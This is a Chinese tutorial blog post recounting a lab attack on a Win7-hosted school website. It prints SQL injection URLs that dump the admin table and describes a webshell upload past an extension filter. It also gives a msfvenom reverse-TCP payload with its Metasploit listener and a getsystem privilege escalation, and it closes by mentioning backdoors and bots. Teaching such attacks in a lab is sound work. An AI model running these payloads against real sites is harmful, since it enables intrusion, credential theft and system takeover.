<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    模擬網站攻擊到提權的全部過程

    VSole2022-12-26 09:38:04

    前言

    給新一屆的學生演示一次網站拿webshell到系統提權的過程,但不幸的是中間翻車了,老年人緊張得忘記了msf監聽木馬的指令,然后哆哆嗦嗦的在大家眼下,打開了筆記查看一下2333…所以更新一下文章,給自己一個教訓QWQ。

    準備工作

    靶機(被攻擊方):win7系統

    入侵者(攻擊方):win10系統、kali系統

    首先啟動win7系統,搭建一個常見的校園網站,然后映射到局域網,使得我們能正常訪問。

    從網站拿到webshell

    sql注入漏洞

    把整個網站瀏覽完一遍后,我們發現這里的url為?id=10結尾,我們猜測可能是一個sql注入點。

    首先我們在id=10后面加上一個單引號’進行判斷。

    這個時候我們發現回顯的數據不正常,于是我們再加一個注釋符號。

    發現數據這個時候回顯的時候是正常的,到這一步我們已經可以確定這里存在一個sql注入漏洞。

    原理我們可以簡單解釋一下
    在網站中,我們一般使用數據庫存儲網站數據,網站和數據庫是存在一個交互性。網站所呈現的內容是由代碼中寫入的sql語句調用數據庫中的內容進行一個呈現,例如我們剛剛看到的文字。
    而sql注入漏洞一般是由于程序員書寫的sql語句不規范所導致的安全事件。

    例如網站源碼中使用如下的sql語句進行查詢。

    給語句結尾的where查詢條件加上一個單引號’。

    很顯然,我們傳入的單引號和前面的單引號閉合,后面只有一個無法成對的單引號,然后報了語法錯誤。

    這個時候我們再加上--+注釋符號注釋掉后面的單引號。

    這個時候查詢的數據就會正確回顯出來。

    原理簡單解釋了一下之后,我們回到剛剛的網站。

    這個時候我們發現存在sql注入漏洞之后,我們就開始進行查詢對方網站數據庫的數據,找到一些敏感信息,例如管理員的賬號密碼等等。

    首先,我們使用order by語句快速猜解出表中的列數。

    發現10列的時候報錯,說明不足10列,我們繼續縮小范圍。

    再查詢第8列的時候,發現數據回顯正確,說明對方表中含有列數8

    我們使用union select 自定義查詢測試一下,zhu意我們這里前面的id=10,要寫成id=-10,把這里的查詢置空。

    發現會分別回顯第三列、第五列和第七列。接下來我們就可以在三、五、七處做做文章。

    查詢數據庫名字:

    http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,database(),4,5,6,7,8--+
    

    得到數據庫名字:qzn_zuiai

    查詢數據庫中的表名:

    http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema="qzn_zuiai"--+
    

    得到一共se2admin,se2fl,se2hd,se2nr,se2tufl,se2tunr,se2wz,se2zf,sj3sk九張表

    通過表名,我們猜測se2admin可能是存儲管理員賬號和密碼的表,所以我們先查詢這張表中的數據

    查詢表se2admin中的字段:

    http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name="se2admin"--+
    

    得到表中的字段值有id,name,pass等,接下來我們查詢name和pass的字段值。

    查詢字段值:

    http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,name,4,pass,6,7,8 from se2admin--+
    

    我們得到管理員賬號:admin,管理員賬號密碼:

    7fef6171469e80d32c0559f88b377245

    很顯然密碼值是被加密的md5值,所以我們去網上找md5網站進行撞庫查詢。

    得到管理員密碼為:admin888

    接下來我們需要查找這個網站的后臺地址,我們使用御劍進行一個掃描。

    御劍爆出了很多敏感地址,我們找到一個admin的目錄,可能是后臺地址,我們去訪問一下。

    輸入我們剛剛得到的管理員賬號和密碼admin:admin888。

    這個時候,我們成功進入對方網站后臺。

    文件上傳漏洞

    接下來我們再這里找到一個文件上傳點。

    我們寫一個簡單的一句話木馬。

    考慮到這里可能會對我們上傳的文件進行一個后綴限制,例如只能上傳jpg或者png圖片格式文件等,所以我們把muma.txt改成muma.jpg格式。

    我們開啟burpsuite,然后點提交,攔截到我們發送的數據包。

    我們把muma.jpg改回php文件類型:muma.php。

    然后發送數據包。

    ok,已經上傳成功,我們去找找我們上傳后的路徑。

    得到我們的上傳完整路徑為:http://192.168.1.167/yxlink/img/img_3699336993.php

    我們使用蟻劍進行連接我們上傳的木馬。

    成功連接,進入到對方服務器。

    到此,已成功拿到webshell。

    反彈shell連接

    接下來我們利用kali的msf制作一個exe類型的反彈型木馬。

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f 類型 -o 文件名
    

    把做好的木馬,通過我們蟻劍剛剛連接的webshell進行上傳。

    上傳成功后,我們在kali啟動msf。

    執行監聽

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.1.131
    set lport 4444
    exploit
    

    執行木馬

    msf開啟監聽之后,我們去蟻劍webshell執行我們上傳的木馬。

    執行之后,回到kali,我們可以看到msf目標正在回連,創建Meterpreter會話成功。

    提權

    首先查看一下我們的用戶權限。

    發現是普通用戶權限,之前我們已經在webshell觀察到對方是win7系統,所以我們采用的是windows的載荷攻擊

    我們嘗試使用getsystem進行提權試試。

    發現直接提權成功,現在我們擁有windows最高權限system。

    接下來我們打印一下系統信息,并且拍照對方電腦現在狀態。

    ok,成功。

    結語

    在拿到system權限之后,我們可以干很多很多的事…例如給對方種下后門,拿來當肉雞等等… …

    這告訴我們開發網站必須注重安全,否則帶來的后果是無窮大的。

    數據庫webshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Webshell-Sniper是一款使用Python編寫的基于終端的Webshell管理器,和以往我們分享的Webshell管理工具有所不同,所有操作都在終端中完成。使用它可對您的網站進行遠程管理。雖然它沒有圖形化的GUI也沒有WEB界面,但這樣的操作也是另有一翻感覺。功能基于終端的shell交互反向連接shell數據庫管理Webshell-Sniper安裝與使用環境服務端 :. 需要注意的是,Webshell-Sniper服務端只支持Unix系統環境。
    數據庫注入提權總結
    2022-08-09 16:49:49
    select * from test where id=1 and ;布爾盲注常見的布爾盲注場景有兩種,一是返回值只有True或False的類型,二是Order by盲注。查詢結果正確,則延遲3秒,錯誤則無延時。笛卡爾積延時大約也是3秒HTTP頭注入注入手法和上述相差不多,就是注入點發生了變化HTTP分割注入常見場景,登錄處SQL語句如下
    到達客戶現場后第一時間告知負責網絡相關的人員請勿對被篡改文件進行刪除或修改,這樣做的原因是方便后續對入侵途徑進行溯源分析。發生安全事件的服務器為Windows還是Linux或者其他的操作系統,確認好操作系統類型方便取證工作。是否為用戶誤操作所導致觸發告警。Windows系統下:使用“MD5校驗器”打開原有文件與疑似篡改文件,獲得MD5值后進行比對,如果兩文件MD5不一樣證明該文件被篡改。
    文中所涉及到的工具均來自于應急響應實戰筆記的歸納總結,gitbook地址:https://bypass007.github.io/Emergency-Response-Notes/。這里僅僅供個人查詢使用,不作他用。文中提到的工具使用方法以gitbook的內容為主,如果找不到就請自行百度。
    由于低權限用戶無法執行太多操作,可以利用反彈上傳Churrasco.exe,后續可以利用它來做提權。輸入net user指令查看是否添加成功,最后提權成功。linux系統提權思路linux基礎信息收集uname -a 顯示全部系統信息cat /etc/issue 內核信息。
    一款新的webshell管理工具
    0x00 前言常見webshell管理工具的分析記錄,著重在流量側。0x01 caidao1、配置使用菜刀是一款專業的網站管理軟件,用途廣泛,使用方便,小巧實用。支持動態腳本[如php/jsp/aspx/asp]的網站!新版antSword的ua也做了隨機變換。在內置的rot13編碼和解碼器下,數據會通過隨機變量傳遞給str_rot13函數,通過變換還原后再交給eval函數執行。
    Webshell簡介webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種代碼執行環境,主要用于網站管理、服務器管理、權限管理等操作。它的流量特征十分明顯,現如今的安全設備基本上都可以識別到菜刀的流量。現在的菜刀基本都是在安全教學中使用。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类